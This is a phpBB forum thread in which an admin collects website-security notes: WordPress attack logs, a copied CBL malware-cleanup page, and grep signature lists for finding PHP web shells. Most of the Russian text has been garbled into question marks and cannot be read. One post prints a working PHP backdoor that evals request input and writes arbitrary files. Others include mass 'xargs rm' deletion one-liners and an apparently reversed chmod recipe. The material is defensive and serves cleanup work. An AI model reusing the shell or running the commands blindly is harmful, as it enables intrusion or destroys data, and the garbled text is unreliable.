- ???????? ? PhpMyAdmin ? ??????? ??????? ????? ???? ?????? ?? ????????? ? ?????????? ??. ??? ?????????? ???? ???????? ?? ? ? ?????? ????? ?????? ?????? ????? "???????". ????????? ??? ????? ????, ????? ??????? SQL ? ??? ???? ???? "????????? ??? ????". ?????? ????? ????????? ?? ???????? "Ok". ???????? ??? ???? ????? ?? ?????? ?????? ? ????????? ???? ?????? ? ?????? ?????;

- ????? ????, ??? ?? ????????? ? ???, ??? ???? ?????? ??????? ?????????, ????? ?????????? ? ???????? ???? ?? PhpMyAdmin. ??? ????? ???????? ???? ????, ?????????? ???? ? ??? ?????? ? ??????? ??? "???????? ???". ????????? ? ???? ?????? ????? "? ???????????" ? ????????? ???????;

- ?????? ?????????? ??????????? ???? ? ????? ??????, ? ???????, ?????????. ????????? Ctrl+H ? ?????? ????? ??????:



? ??????? ???? ??????? ????? ????? ????? ???????? ??? ???????? ? ????? ???????, ????? ?? "???????? ???";

- ?? ? ?????? ???????? ????? ? PhpMyAdmin ? ????????? ?????? ?????? "??????" ? ????????? ??? ???? ? ?????? ???????. ????????? ????????? UTF-8.


?????????? ????????? ????????? ????? ?? ????? ? ?????. ??????? ??? ????? ? ??????? FileZilla. ?????? ??? ??????? ??????? ????? ???? ???????????? ?????????, ??????? ????? ?????? ? ?????? ???????. ?? ?????? ????? ?????? ?????: ?? ?????, ??????? ????????? ? ???????? ?????????? 444, ?? ????? ? ???????? ?????????? ?????? 755, ?? ????? tmp ? logs ?????? 705, ?? ???? ?????? ??????? ????????? 555, ?? ????? image/stories ????? ????????? 755, ?? ????? Cache 777.

? ????????, ? ????? ???? ??? ???????????? ?????? ??????? ??? ??????? ?????? ????? ?? Joomla. ???? ? ????? ?????? ??? ?????-?????? ?????????? ???????, ?? ???? ?? ????????? ? ??????????????? ?????? ?? ????? ?? ????????? ???????????? ?? ????? Joomla. ????? ??? ??????? ?? ?????????? ?? ???????, ? ??? ????? ?? ??????????????. ???? ?? ?????? ?????????? ?????????? ?????? ????? Joofaq.ru, ?? ??????????? ?? ????????? ???????? ????? ??????? ????????.


Последний раз редактировалось: admin (Пн Окт 08, 2012 9:46 am), всего редактировалось 1 раз
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
admin
Site Admin


Зарегистрирован: 11.09.2008
Сообщения: 505

СообщениеДобавлено: Вт Июн 19, 2012 7:32 pm    Заголовок сообщения: Ответить с цитатой

????????????? ? ????????? ??????
??????? ??? http://virusdie.ru/index.php
????? ????
find ~user/public_html/ -type d|xargs chmod 644
find ~user/public_html/ -type f |xargs chmod 755
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
admin
Site Admin


Зарегистрирован: 11.09.2008
Сообщения: 505

СообщениеДобавлено: Ср Июл 18, 2012 12:31 am    Заголовок сообщения: Ответить с цитатой

?????? wp
10+ ???????? ???????? ????
http://cospi.ru/10-sposobov-zashhitit-blog/
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
admin
Site Admin


Зарегистрирован: 11.09.2008
Сообщения: 505

СообщениеДобавлено: Чт Ноя 15, 2012 11:16 am    Заголовок сообщения: WP Ответить с цитатой

http://blogproblog.com/uyazvimost-v-timthumb-php/
http://wordpress.org/extend/plugins/timthumb-vulnerability-scanner/
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
admin
Site Admin


Зарегистрирован: 11.09.2008
Сообщения: 505

СообщениеДобавлено: Пт Dec 14, 2012 12:10 am    Заголовок сообщения: Ответить с цитатой

http://www.vvbox.ru/domains/kak-vordpress-lomayut-i-kak-ot-ehtogo-spastis

Код:
9.12.2012 01:42

? ???? ?????? ? ???????? ? ???, ??? ?????? WordPress, ????????? ???? ? ?????? ????????? ????????? ?????. ? ?????? ??????????? ???????? ???, ?? ?? ???? ??????? ??????, ??????????? ???????? ????, ip-?????? ??????, ????????, ????????? ????????????.

????. ? ?????????? ????????? ????? ????????? ???????????? — ? ????? ????????? ??? ???????? ???? ? ???????-????????? ?? ????? ?????? ?????? ????. ? ??? ????? ??????? — ?? ??? ???????? ????? ???????? ????, ? ??? ???? ???????????.  ? ??? ??? ??? ?????????:

??? ?????? ?????? ??? ??????????????, ??? ????????? ?? admin:

87.244.148.82 — - [25/Nov/2012:01:55:09 +0400] «GET /?author=1 HTTP/1.0″ 301 0 «-» «Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4″
 87.244.148.82 — - [25/Nov/2012:01:55:10 +0400] «GET /author/boss/ HTTP/1.0″ 200 46705 «-» «Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4″

?????? ?????? ????????? ??????:

190.220.8.214 — - [25/Nov/2012:01:55:30 +0400] «POST /wp-login.php HTTP/1.0″ 200 3759 «-» «Mozilla/3.0 (compatible; Indy Library)»
 190.147.208.42 — - [25/Nov/2012:01:55:35 +0400] «POST /wp-login.php HTTP/1.0″ 200 3759 «-» «Mozilla/3.0 (compatible; Indy Library)»
 85.10.202.142 — - [25/Nov/2012:01:55:43 +0400] «POST /wp-login.php HTTP/1.0″ 200 3759 «-» «Mozilla/3.0 (compatible; Indy Library)»

? ??????????? ??????? ?????? ??????????, ????????, ?????? ???? ???????, ??? admin, ?? ?????, ??? 1q2w3e4r:

60.214.67.86 — - [25/Nov/2012:01:59:01 +0400] «POST /wp-login.php HTTP/1.0″ 302 0 «-» «Mozilla/3.0 (compatible; Indy Library)»
 60.214.67.86 — - [25/Nov/2012:01:59:04 +0400] «POST /wp-admin/ HTTP/1.0″ 200 67017 «-» «Mozilla/3.0 (compatible; Indy Library)

??? ???????? ? ?????? ???????, ??????????? ? ???? ????? ???????? ???????? ?????? ???-????:

87.244.148.82 — - [25/Nov/2012:01:59:19 +0400] «POST /wp-login.php HTTP/1.0″ 302 0 «-» «Mozilla/3.0 (compatible; Indy Library)»
 87.244.148.82 — - [25/Nov/2012:01:59:20 +0400] «POST /wp-admin/ HTTP/1.0″ 200 67017 «-» «Mozilla/3.0 (compatible; Indy Library)»
 87.244.148.82 — - [25/Nov/2012:01:59:21 +0400] «GET /wp-admin/plugin-editor.php?file=akismet/legacy.php&plugin=akismet/akismet.php HTTP/1.0″ 200 45769 «-» «Mozilla/3.0 (compatible; Indy Library)»
 87.244.148.82 — - [25/Nov/2012:01:59:23 +0400] «POST /wp-admin/plugin-editor.php HTTP/1.0″ 302 0 «-» «Mozilla/3.0 (compatible; Indy Library)»
 87.244.148.82 — - [25/Nov/2012:01:59:24 +0400] «POST /wp-admin/plugin-editor.php?file=akismet/legacy.php&a=te&scrollto=0 HTTP/1.0″ 302 0 «-» «Mozilla/3.0 (compatible; Indy Library)»
 87.244.148.82 — - [25/Nov/2012:01:59:25 +0400] «POST /wp-admin/plugin-editor.php?file=akismet/legacy.php&a=te&scrollto=0 HTTP/1.0″ 302 0 «-» «Mozilla/3.0 (compatible; Indy Library)»

???-???? ??????? ? ????????:

87.244.148.82 — - [25/Nov/2012:01:59:31 +0400] «POST /wp-admin/plugin-editor.php?file=akismet/legacy.php&a=te&scrollto=0 HTTP/1.0″ 302 0 «-» «Mozilla/3.0 (compatible; Indy Library)»
 87.244.148.82 — - [25/Nov/2012:01:59:31 +0400] «GET /wp-content/plugins/akismet/legacy.php HTTP/1.0″ 200 120 «-» «Mozilla/3.0 (compatible; Indy Library)»

? ????? ?????? ???? ????? ???-???? ?????????? ????????:

92.38.209.192 — - [05/Dec/2012:21:52:15 +0400] «POST /wp-content/plugins/akismet/legacy.php HTTP/1.0″ 200 15738 «-» «Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0″
 92.38.209.192 — - [05/Dec/2012:21:52:15 +0400] «POST /wp-content/plugins/akismet/legacy.php HTTP/1.0″ 200 16412 «-» «Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0″
 92.38.209.192 — - [05/Dec/2012:21:52:15 +0400] «POST /wp-content/plugins/akismet/cookieZFU.php HTTP/1.0″ 200 36 «-» «Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0″
 92.38.209.192 — - [05/Dec/2012:21:52:15 +0400] «POST /wp-content/plugins/akismet/legacy.php HTTP/1.0″ 200 17036 «-» «Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0″
 92.38.209.192 — - [05/Dec/2012:21:52:16 +0400] «GET /wp-content/plugins/akismet/xinfo.php?sf=0&showro=0 HTTP/1.0″ 200 3923 «-» «Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0″
 92.38.209.192 — - [05/Dec/2012:21:52:16 +0400] «GET /wp-content/plugins/akismet/xinfo.php?sf=0&showro=0 HTTP/1.0″ 200 3923 «-» «Mozilla/5.0 (Windows NT 6.1; WOW64; rv:16.0) Gecko/20100101 Firefox/16.0″

? ??? ? ???? ?????? ?????????:

92.202.91.45 — - [05/Dec/2012:21:54:12 +0400] «POST /wp-content/plugins/akismet/cookieZFU.php HTTP/1.0″ 200 36 «-» «Mozilla/5.0″
 92.202.91.45 — - [05/Dec/2012:21:54:13 +0400] «POST /wp-content/plugins/akismet/cookieZFU.php HTTP/1.0″ 200 36 «-» «Mozilla/5.0″
 188.76.208.38 — - [05/Dec/2012:21:55:47 +0400] «POST /wp-content/plugins/akismet/cookieZFU.php HTTP/1.0″ 200 36 «-» «Mozilla/5.0″
 188.76.208.38 — - [05/Dec/2012:21:55:48 +0400] «POST /wp-content/plugins/akismet/cookieZFU.php HTTP/1.0″ 200 36 «-» «Mozilla/5.0″
 188.76.208.38 — - [05/Dec/2012:21:55:49 +0400] «POST /wp-content/plugins/akismet/cookieZFU.php HTTP/1.0″ 200 36 «-» «Mozilla/5.0″

? ??? ?? ?? ???????, ? ?????? irc-??? ??? DDoS-????. ??? ???????-?????? ??????? ?? ?????? ??? ??????????? ?? ? ??????? ?????. ??? ???????? ???? ????????. ??? ??? ??? ??????, ??? ?????? ?????? ????????????. ???? ???? ???-????, ?? ? ?????? ????? ??????? ??? ??????.

 

??? ?? ??????? ???, ????? ????? ?? ?? ????????? ? ????.  ??????????  ???????? ??????. WordPress — ????? ???????? CMS. ?????????? CMS, ??????? ?? ?????? ? ???????, ?? WordPress ???????? ?? ???-?? ?????, ???? ???????? ????? ??????? ??????? ??????????? ? ????????????.

??????? ??????. ?? ???????? ????????? WordPress, ??????? ? ???? ?? ?????????? ??????.  ? ??????? ?? ????????? ?????? CMS, WordPress ??? ?????????? ?? ???????? ? ??????? ? ???? ?? ????????????. ???? ? ?????? ??????????? ?????????? ? ???? ????????? ?????????? ?? ?????? ?????????.

??????? ??????. ?????????????? ??????? ??????.  ??????? ?????????? ????????? ? ??????????? ???????. ? ???? — ? ???????????????????? ???????. ??-?? ????, ??? ? WordPress ? ???????????? ? ???? ??? ? ???????, ????? ??? ?????? ?????? ??????? ? ???????? ?????? ?????????????? ? ??????????? ?????????????? ????????? ???????? ??? ?????????? ???-?????.  ?????????? ?????? ?????? ???????? ?? 8-15 ???????? ? ????????? ????????? ????, ???? ? ??????, ?? ?????????? ??????? ??????????? ??????, ? ??? ????? ? ?????? ? ?????? ????????? ?????????? ??? ????????? ?????????. ???? ?????? ??????????? ????? ?????? — ???? ?????????? ????????? ??????? http://password.vvsite.ru.

??????? ??????. ??? ????, ????? ???????????? ????????? ?????? ??????????, ?????????? ?????? WP Sentinel, ??????? ????? ????????????? ?????? ip-??????, ? ??????? ???? ??????? ??????? ???????. ? ???? ? ?????????? ??????? ????? ??????????? ??? ??????? ??????? ?????? ip,  ?? ?? ???? ????? ?? ???????? ?????????????? ??????????? ip, ?, ???? ?????? ?? ?????????? ? 10-20 ???????, ?? ? ???????? WP Sentinel ????? ??????? ?? ?????? ????????? ??????.

??????? ?????????. ????????? ?????????? ???????? ? ?????????? wp-content. ??????? ???????? ? ???, ????????????? ? ???? ??????????, ??????? ?? ?????????? ????????, ??? ?????????? ????? ????????? include ? require. ? ????????? ????? ??? ?????????? ?????? WordPress ?? ??????? ???? ?????????? ??????????. ??? ??? ?????????? ? wp-content ????? .htaccess ?? ????????:

<files *php>
deny from all
</files>

?? ???????? ?????????????? ??????????????? ???-??????, ???? ???? ?? ?????? ??? ??????????.

????????? ???????????????? ??????? ???-???? ?????????? ???????? ? ????? ????????. ? ???? ?????? ???? ??????? ??????????????? ?? ?????????.

??????? ?????. ????????? ? ????? ??????. ?? ????????????? ?????????????. ?? ???? ??????, ??? ????? ????? ????? ?????? ??? ????????. ?? ???????, ???? ?? ??????????.  ???? ???? ??? ???? — ??????????????, ??????????????? ? ??????????????, ??? ??? ????? ????? ???????? ????????, ? ?????? ?? ??? ????, ????? ??????? ??????? ???, ? ???????? ????? ?????????? ????????????? ??? ????, ????? ???????? ???????? ??? ?????????? ???????????? ???????? ? ???????? ??????????? ???????? ? ?????????????? ??? ???? ?? ?????????? ??????????? ?????.
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
admin
Site Admin


Зарегистрирован: 11.09.2008
Сообщения: 505

СообщениеДобавлено: Вт Ноя 24, 2015 4:13 pm    Заголовок сообщения: Ответить с цитатой

IMPORTANT

We know that this is long. But if solving these problems were so easy, this IP address wouldn't have been listed in the first place.

Seeing this web page means the problem as NOT been fixed yet. If the web page link shown below is not your page and you are NOT the hosting administrator, you cannot fix this problem, and you will need to contact the hosting administrator to fix it.

This IP address corresponds to a web site that is infected with a spam or malware forwarding/redirection link.

In other words the site has been hacked and is serving up redirection links to spam or malware. It is also almost certainly sending spam too.

We recommend that you review instructions below so as to prevent this happening in future.

The infected host name is "tata613.ru", and this link has an example of the malicious redirect: "http://tata613.ru/admin/controller/index.php?rbqu2hftjq4hgflv5hvatfuwbwese" Depending on the infection type, there may be dozens more malicious redirection pages under tata613.ru.

WARNING As the link is known to malicious, browsing that link is at your own risk.

If tata613.ru is not your host, there is nothing you can do to fix this problem: contact your hoster and have them fix it.

If you are the administrator, searching your web server logs for tata613.ru will likely reveal other copies of these malicious links as well as the command-and-control links (often .php).

One hosting company reported that the malicious script was called "mainik.php" and was dropped from Russian IP addresses.

If the problem is not resolved, this will undoubtably get listed again, and runs the risk of having the CBL disallow further removals. So, don't just delist the IP and expect it to stay delisted unless the root cause is solved.

In other words, Fix it! or run the risk of self-removals being refused in future listings.

Infected servers are usually shared web hosting environments running Cpanel, Plesk, Joomla or Wordpress CMS software that have become compromised either through a vulnerability (meaning the CMS software is out of date and needs patching), or users account information (userids/passwords) have been compromised, and malicious software/files are being uploaded by ftp or ssl. There are several different "families" of malware doing this, including darkmailer, directmailer, Stealrat and others. As a consequence of this, the instructions below focus on finding the problem no matter what it is.

Important: Simply removing the malicious link in general will not prevent future relistings. In fact, several of the botnets doing this have literally dozens of malicious redirects under the same hostname (webhosting account), other malicious links (eg: in Stealrat the command-and-control .php script), and there may be more than one infected webhosting account on the same machine. While manual-cleaning of one of these infections sometimes works, it's generally quite difficult to be sure you have it all. We recommend disabling the account, then reinstalling the account from backups.

We believe that these specific infections are frequently done by altering web server access control mechanisms (example, ".htaccess" files on Apache web servers), and causing the redirect to occur on all "404 url not found" errors. We would appreciate it if you can give us copies of the modifications that this infection has made to your system.

It probable that the change was made via SSL or ftp login using userid/password stolen from the "owner" of the hostname/domain. They should run anti-virus tools on their computers, and the password they use to access the web site should be changed immediately.

If you do not recognize the hostname tata613.ru as belonging to you, it means that some other account on this shared hosting site has been compromised, and there is NOTHING you (or we) can do to fix the infection. Only the administrator of this machine or the owner of tata613.ru can fix it.

Below we've included some information that should help you find and resolve the problem. But again, if it's not your hosting account that's infected, you're unlikely to be able to fix it.

Special note: this listing is based upon detecting a malicious redirector page. Much of the following talks about detecting outbound malicious email. While most redirecter-infected web hosts will also be sending email, not all will. By having the link above, you already know which hosting customer is infected, and the web server logs should tell you most of what you need to know.
CMS Infections in General

Many CMS infections are due to the StealRat botnet, it should be the first to check. This link is a Trend Micro PDF describing the infection in copious detail. While the PDF should be consulted for full information, checking for mysterious/unexplained PHP scripts in wp-content/plugins (if you're running Wordpress) directories should get you started. This link has instructions for a more directed search for it.

Finding Stealrat can be as simple as running the following command on UNIX-like systems - for "[dirs]", substitute in the web server document root, CGI and image directories:
find [dirs] -print | xargs -d'\n' grep 'die(PHP_OS.chr(49).chr(4Cool.chr(43).md5(0987654321'

If the above doesn't work, don't assume you are not infected. The Malware may have changed, or you didn't search the right directories. Keep searching.

Our findbot perl script has been enhanced to find Stealrat. However, we cannot guarantee that findbot.pl will find all copies of malware.

New: MELANI is a Swiss computer security/analysis center, and the link has general instructions on how to clean up CMS (Content Management Systems like Drupal or Wordpress) sites from infection.

In virtually all cases, these infections are injected onto the victim servers by means of vulnerabilities in the CMS software (eg: Drupal, Wordpress, etc). It is critically important that everyone using CMS keep them patched up to date:
Official Wordpress Downloads
Official Joomla Downloads
Official Drupal Downloads
Official Typo3 Downloads


If you are running Drupal, make sure that the patches referred to here are applied. If you're running Drupal you should upgrade to the latest versions.

Of late some of these infections are facilitiated by a SSH Rootkit called "ebury". See the link for more detail.

In most cases, this IP address would be that of a shared hosting environment. If you are a customer of this environment, you will almost certainly not be able to do anything about it, only the administrators of the hosting environment itself can. Please contact your administrators, and refer them to this page.

If the administrators are reluctant to do anything please try to convince them, because there is nothing you can do to fix this problem.
For the System Administrators

Your task is to find the current problem, fix it, and prevent it from happening again.
Finding the problem by network activity: Linux/FreeBSD etc

One way of finding the user that is infected and spewing spam is to use the "lsof" (list open files) utility. "lsof" is available for most versions of UNIX-like systems such as Linux as part of the official distribution, but may not be installed by default. So first, make sure you have it installed. On many systems such as Ubuntu, you can install it by:
sudo apt-get install lsof

Once lsof is installed, you can issue the following command
sudo lsof -i | grep smtp

You may see a number of lines, such as (example.com takes the place of your machine's name):
sendmail- 18520 root 3u IPv4 3016693 0t0 TCP *:smtp (LISTEN)
sendmail 4401 mail 13u IPv4 8742322 0t0 TCP example.com:42177->mail1.hotmail.com:smtp (ESTABLISHED)
exim 6348 mail 3u IPv4 210565067 0t0 TCP *:smtp (LISTEN)
find 4403 foo 13u IPv4 8742322 0t0 TCP example.com:42176->mtain-dk.r1000.mx.aol.com:smtp (ESTABLISHED)

The first line, for example, is your sendmail mail software "LISTEN"ing (as userid root) for inbound email connections - this is normal. The second line is sendmail "caught" at the moment of sending an email (as userid "mail") from your machine to a hotmail server - that is also perfectly normal. You may see similar lines with "exim" or "postfix" or "smtpd" or "qmail" instead of sendmail - all depending on what mail server you run - example - the third line is an Exim listener. The important thing that indicates that it's normal is that the userid is "mail" or "mailman" or something like that - NOT an ordinary user.

The fourth line is a program called "find", running under userid "foo" making a connection to an AOL server.

It's examples like the fourth line you're looking for - it tells you the userid of the infected user. In this case it also indicates that the infection is masquerading as the program "find". There will often be more than one of these.

Simply killing these processes is NOT enough, because they will often restart on their own. You will need to find whether these are started by a cron job owned by that user, or, spawned through your web server, or started from a ssh login. Find and delete the program - often a PHP or Perl script. In some cases, however, the program deletes itself as soon as it starts. The "find" example above is a Linux binary executable that contains an encrypted perl script. Since this was first written, it now sometimes masquerades as "mail" or "ntpd". Assume it could be anything. You will also need to find out how the script got installed on your machine - often through Joomla, Wordpress, Cpanel or Plesk security holes, or ftp upload and secure it.

WARNING Just because you didn't find a line like the "foo" line above doesn't mean the machine is not infected! It just means that the machine is not sending email at the instant lsof was run. If you don't see a line like the "foo" line, we suggest that you run the lsof command multiple times. Example:
while true
do
sudo lsof -i | grep smtp
sleep 10
done
Finding the problem by finding the script: Linux/FreeBSD

NEW! There's a new version of findbot that should find CryptoPHP faster and simpler - try the -c option.

There are a number of scanners that can be used on web servers to try to find malicious PHP and Perl scripts, such as rkhunter etc.

With the assistance of others, we've written a simple perl script called findbot.pl that searches for such things as r57shell, cryptphp etc. It will search your system can find potentially dangerous scripts.

As it's very simple-minded you will have to carefully inspect the files it finds to verify whether what it finds is malicious or not. Be aware of the file types - finding executable code fragments within ".png" or ".jpg" files is clearly demonstrates that the file is malicious.

In order to use findbot.pl, you will need Perl installed.
Install perl if necessary
Download findbot.pl
Follow the instructions at the beginning of the findbot.pl file
Armoring PHP against infections

Suhosin may be a useful tool to protect your PHP environment from various malware.

Many of these infections start themselves running, and then delete themselves from disk. Which means you won't be able to find it. Check your ftp and SSH logs for suspicious files and logins. This is why it's so important to prevent it happening again.

One additional way of finding this infection that works for some variants is to run the "file" command (you may have to install it - eg: "sudo apt-get install file") on the suspicious program.

"ELF 32-bit and "corrupted section header size" from the example below means that you've probably found the right file:
$ file sshd
sshd: ELF 32-bit LSB executable, Intel 80386, version 1 (FreeBSD), statically
linked, corrupted section header size


The above test can be used in bulk, using either of the following two commands:
file /path/to/directory/* | grep 'corrupted section'
find /path1 /path2 -print | xargs -d'\n' file | grep 'corrupted section'
If you find such a file, please send us copies.
Finding the problem by network activity: Windows

The Windows environment is rather less developed for finding these things than UNIX-like systems. However, we can recommend the tcpview tool, so please see tcpview/tcpconn in our advanced section.
Finding the problem by logs: (Mostly) Linux/FreeBSD

Most of these scripts are quite good at hiding their presence. Some of them start up, and them remove the on-disk copy, so there's nothing to see. None of them volunteer where they are, so samples don't help. Most of these scripts bypass your mail server software, so there is nothing to see in the mail logs or queues.

However, they all do need to get on your system somehow, and that often leaves logs. If you can find those log records, often that will help you identify the infected user and find the malicious files (if they are still there).

Generally speaking, these are the ways malicious scripts get onto a system:
Web sites often make FTP or SSL available so their customers can upload content or log in to manage their web pages. If the customer's computer is compromised with a keylogger, it means that the criminal can upload anything they want. You can usually see this activity in your FTP or SSL logs - look for uploads of .php or .pl files, lots of oddly named files, access from a large variety of IP addresses, etc. If you do find something like this, it's important to get the user to change their password, and do virus scans of their computers.
Check your web server for large quantities of requests to the same PHP or CGI or Perl file, or POST commands, etc... This can reveal where the infection is, and often how it got there.
Most CMSes, in particular, Plesk, CPanel, Wordpress and Joomla quite simply have severe security holes being found in them, seemingly daily, and hosted environments are often reluctant to keep up to date with their patching. You may never find a reasonable explanation of how the malicious software got there
Preventing it Happening Again
Delisting inhibited Follow the above instructions to get it delisted.



<< Back to CBL homepage
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
admin
Site Admin


Зарегистрирован: 11.09.2008
Сообщения: 505

СообщениеДобавлено: Чт Фев 25, 2016 3:36 pm    Заголовок сообщения: Ответить с цитатой

????? ????????? ???????????? ??????
find /var/www/ -type f -name '*.ph*' -ctime -7
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
admin
Site Admin


Зарегистрирован: 11.09.2008
Сообщения: 505

СообщениеДобавлено: Ср Июн 22, 2016 10:14 am    Заголовок сообщения: Ответить с цитатой

http://firstwiki.ru/index.php/?????_?_????????????_??????_??_????????????_??

????? ????????, ??????????? ???? ? ?????? ??????? Zeus, Exploit Kit Redirect

???????, ??????? ?? ?????? ?????? ???????:

#
Код:
grep -Rils --include=\*.php -e ' n7b0ecdff' -e 'CmlmKGlzc2V0KCRfUE9TVFsiY29k' ./* | xargs rm


??? ??????? ?????? ????????? ????-??????? ? ???????? ?? ?????? ? ???? spam_scripts ? ??????????, ??? ?? ?????? ??????????:


#
Код:
grep -Rils --include=\*.php -e '\@\$emaillist\=\$_POST' -e '\$emaillist=' -e '\$smtp_username=' -e '\$smtp_password=' -e 'Sender Anonym Email' ./* > spam_scripts


??? ??????? ?????? ????????? ???????????? ?????????, ? ???????? ?? ?????? ? ???? redirects ? ??????????, ??? ?? ?????? ??????????:

#
Код:
grep -Rils --include=\*.{php,htm,html} -e 'if(md5(md5(\$' -e 'h1\>Loading...' -e 'b\>Please wait a moment ...\ You will be forwarded. \<' -e '... Please wait...\<\/h3' -e 'You are here because one of your friends has invited you...\
Redirecting...' -e 'bankofamerica' -e 'http:\/\/hellosomeguys' -e 'rldailynews.com' -e 'http\:\/\/.*doctor.*\.com' -e '\-\-81a338\-\-' -e '\; it.src = ' ./* > redirects


? ?????????? ?????????? ???? ??????, ?? ???????? ??? ?????? ??????, ??????? ?????????? ??????? ?????????: ???? ????? ??? ??? ?????? ??????, ?? ?? ?????? ??????? ??? ????? ?? ??????.
????? ????????? malware ????????

??? ??????? ?????? Shell'? ?? ??????, ? ???????? ?? ?????? ? ???? [b]malware1 ? ??????????, ??? ?? ?????? ??????????. ??? ??? ????? ??????? ????? ?????? ???????? ??????????????? ?????, ??????? ? ?? ????? ????? ???? &, ??? ???????? ?????????? ?????? ? ????????.[/b]

#
Код:
grep -Rils --include=\*.{php,htm,html} -e 'FilesMan' -e 'b=4594' -e 'e2aa4e' -e 'v58f57b98 = 0' -e 'forexam\@pandion.im' -e 'pathToDomains' -e 'if(navigator.userAgent.match(' -e 'var vst = String.fromCharCode' -e 'Menu\_files\/jquery.js' -e 'i5463 == null' -e 'r57.gen.tr' -e '\/rsize.js' -e 'feelthesame.changeip.name' -e '40,101,115,110,98,114,105,110' -e 'c99sh' -e 'Shell by' -e ' sh_ver' -e '\.tcpflood' -e 'c999sh' -e 'Array(base64_decode' -e 'Attacker Perl File' -e 'bogel = ' -e '(\!function_exists(\"getmicrotime\"))' -e'\$d=substr' -e 'WSO ' -e 'r57shell' -e 'msg=@gzinflate(@base64_decode(@str_replace' -e '6POkiojiO7iY3ns1rn8' -e ' mysql_safe' -e 'sql2_safe' -e 'aHR0cDovLzE3OC4yMTEu' -e 'php function _' -e 'encodeURIComponent(document.URL)' -e '\; if(isset(\$_REQUEST' -e 'UdpFlood' -e 'udp\:\/\/1.1.1.1' -e '\ (md5(\$_POST\[' -e 'header(\"Location\: http' -e 'fx29sh_' -e 'c999sh_surl' -e 'c99sh' -e '\/request12.php' -e 'NlOThmMjgyODM0NjkyODdiYT' ./* > malware1 &


??? ??????? ?????? ????????? malware ? php ???????? ?? ??????, ? ???????? ?? ?????? ? ???? malware2 ? ??????????, ??? ?? ?????? ??????????. ?????????? ???? ???????, ??? ?? ??? ? ??????????, ????? ?????? ??????????????? ?????, ??????? ? ?? ????? ????? &:


Код:
# grep -Rils --include=\*.php -e 'JGNvZGUgPSBiYXNlN' -e 'DQplcnJ' -e 'eval(gzinflate(base64_decode' -e 'eval(gzinflate(str_rot13(base64_decode(' -e 'eval(gzuncompress(base64_decode(' -e 'eNrtfWt72zbS6Of6VyBcZSk1uviSS2vFTl1Haf' -e 'JpdGVDb25kICV7SFRUUF9VU0VSX0FHRU5' -e 'JHNoX2lkID0gIld5QW1aR0ZuWjJWeU95Q' -e 'sDdphXZgsTKddSYnsFVT9EUfRCI' -e 'QBDB51E25BF9A7F3D2475072803D1C36D' -e 'Yzk5c2hlbGwucGhw' -e 'aHR0cDovL3d3dy5zb21lLWNvZGUvZXhwbG9pdHMuYw' -e 'aWYgKChwcmVnX21hdGNoKCcvdGV4dFwvdm5kL' -e 'QfgsDdphXZgsTKog2c1x' -e 'QGVycm9yX3JlcG9ydGluZygwKTsg' -e 'JHNoX2lkID0gIlQzZHVaV1' -e 'rUl6QttVEP58lfoflr' -e 'jVNtT9tADP4' -e 'c2V0X3RpbWVf' -e 'UFycmF5KGJhc2U2NF9kZWNvZGUo' -e 'pZLfasMgFMbvB3sHK4UolLKNXa3r' -e 'nVNdi9swEHw' -e 'JHl5eU5CTnJLZk5TeUdyaX' -e 'JZvHbsRIlkX39SNdBS5okwbd0wV6n' -e '8\<\[\@7MGLKMs' -e 'DVU1EuQGEHyO70qBWKst' -e '\@432LKMs' -e 'QfgsDdphXZgsTKog' -e 'ZGVmaW5lKCdBS0lTTUVUX1' ./* > malware2 &


??? ??????? ?????? ????????? malware ? java ???????? ?? ??????. ?????? ??????? ?????:
#
Код:
grep -Rils --include=\*.js -e '\%3C\%73\%63\%72\%69\%70\%74\%20\%74\%79\%70' -e 'kSKlBXYjNXZfhSZwF2YzVmb1h' ./*



???????? ? ??????/???????? ????????? ????????

????? ????????? ?????? ?????????? ?????? ??????? ????? ?? ?????????.

malware1:
Код:
cat malware1 | grep -v 'public_html' | grep -v 'webstat' | xargs grep -Rils 'FilesMan' | \
xargs grep -Rils "sDdphXZgsTKddSYnsF" | xargs sed -i "" -e "/auth_pass\ =/d" &

Код:
cat malware1 | grep -v 'public_html' | grep -v 'webstat' | xargs grep -Rils 'FilesMan' | \
xargs grep -Rils "sDdphXZgsTKddSYnsF" | xargs sed -i "" -e "/sDdphXZgsTKddSYnsF/d" &

Код:
cat malware1 | grep -v 'public_html' | grep -v 'webstat' | xargs grep -Rils 'FilesMan' | xargs rm &


????????? ??????? ??????? ??????? ? ???????? ?????:
Код:
<?php $awff = "a9b193d36245fc6a750a75eb594a3c70"; if(isset($_REQUEST['vpyu'])) { $wwyioqi = $_REQUEST['vpyu'];
eval($wwyioqi); exit(); } if(isset($_REQUEST['yccqdyb'])) { $mhvwg = $_REQUEST['qipseeqy'];
$mvwvjnec = $_REQUEST['yccqdyb']; $gfcked = fopen($mvwvjnec, 'w'); $qllnske = fwrite($gfcked, $mhvwg);
fclose($gfcked); echo $qllnske; exit(); }?>
cat malware1 | xargs grep -Rils ' = fopen(\$' | xargs grep -Rils ' = fwrite(\$' | xargs rm &


???????, ??????? ?????? ???-????? FilesMan:
Код:
cat malware1 | xargs grep -Rils 'FilesMan' | xargs grep -Rils 'auth_pass' | xargs rm &


??????? ??? ??????? ???????? ? ?? ???? ???? ?????? ?????, ???? ???????.
Код:
cat malware1 | xargs grep -Rils 'b=4594'


malware2:

?????? ???? ?? ????????? ???????:

Код:
